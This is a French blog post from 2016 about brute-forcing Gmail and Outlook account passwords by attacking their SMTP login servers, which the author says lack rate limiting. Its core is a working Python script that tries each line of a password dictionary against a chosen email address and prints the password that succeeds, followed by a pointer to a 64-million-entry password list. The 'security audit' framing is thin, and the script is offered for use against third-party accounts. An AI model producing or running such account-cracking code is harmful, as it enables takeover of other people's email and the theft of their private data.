[Brutus] Trouver le mot de passe d’un compte Gmail, Outlook, ….

Publié le 5 mars 2016 par #Ro0t

Salut les z’amis !

Bon Weekend à vous !
Ici nous allons parler de brute !
Vous m’avez bien entendu, souvenez-vous du grand gaillard bien bâti qui vous piquait toutes les nanas et vous volait en plus vos carambars à la récré …

Eh bien nous allons observer un moment de silence …
Car une technique de Hacking, ressemble plus ou moins à de ce genre de personnage … le « brute force » … et nous allons l’étudier aujourd’hui dans cet article

Une technique qui consiste à secouer un système en lui envoyant pleins de mot de passe dans la tronche, jusqu’à ce que celui-ci aquiesce gentiment lorsqu’il reçoit le bon …

Bref, ce sont mes copains d’Aston Ecole qui m’ont inspiré cet article.
Car Nathan, l’heureux gagnant du concours organisé par Lock*****, a publié une vidéo sur Youtube de ces exploits en python …
Démontrant ainsi qu’il était possible de brute forcer un compte Gmail !

Aussi, j’ai vu ça … et dans ma tête ça a été ça …

Bref, en gros j’ai percuté sur un truc tout con …
Lorsque l’on s’essaie à faire du brute force sur des formulaires de connexion …
Les diverses messageries Outlook, Gmail, Yahoo, … se montrent très peu réceptives…
Elles finissent carrément par nous chasser à coup de captcha, voir nous bannir ..

Mais lorsque l’on s’attaque en brute force, directement au serveur smtp …
Biiim ! il n’y a aucun contrôle!
C’est OPEN BAR … pas de sécurité type fail2ban …

21 ème siècle !

C’est tout simplement hallucinant …

Bref, j’ai voulu vous partager un petit bout de script fonctionnel, que j’ai rédigé, pour m’assurer que ça n’était pas du flan …
Et bien non … ça n’en n’est pas …
Nous sommes au 21 ème siècles, et des grosses boites comme Google, se sécurisent à hauteur de 50% contre ce genre d’attaque du moyen age …

#!/usr/bin/python
# Dyrk.org 2016-2017

import smtplib

# Outlook.com
smtp_s   = 'smtp-mail.outlook.com'

# Gmail
# smtp_s = 'smtp.gmail.com'

smtp_p = 587
sender = '[email protected]'
dico   = 'pwdlist.txt'

with open(dico) as f:
    for password in f:
        password = password.replace('\n', '')
        try:
            m = smtplib.SMTP(smtp_s, smtp_p)
            m.ehlo()
            m.starttls()
            m.login(sender, password)
            print '[OK] => ' + sender + ' : ' + password
            m.close()
            exit()
        except smtplib.SMTPAuthenticationError, e:
            if e[0] == 534:  # Gmail
                print '[OK] => ' + sender + ' : ' + password
                print e
                exit()
            else:
                print 'try ' + password + ' .... err. ' + str(e[0]) \
                    + '   >>>  ' + e[1]

Voilà, avec ça …
Vous pourrez en :

configurant une adresse email cible
renseignant une configuration smtp correspondante à l’adresse cible
spécifiant un fichier dictionnaire contenant un mot de passe ligne par ligne …

Parvenir à auditer la sécurité d’une adresse email …

Vous trouverez sur cette page, un dictionnaire de 64 millions de mots de passe